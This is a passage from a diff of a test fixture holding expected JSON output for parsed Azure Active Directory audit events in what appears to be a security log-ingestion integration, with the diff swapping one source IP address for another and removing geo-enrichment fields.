APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125087Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name
\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservi
ce\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -9234,25 +8442,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9266,7 +8456,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -9402,7 +8592,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -9414,12 +8604,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036365700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125093800Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -9445,25 +8635,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9477,7 +8649,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -9613,7 +8785,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -9625,12 +8797,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036370100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"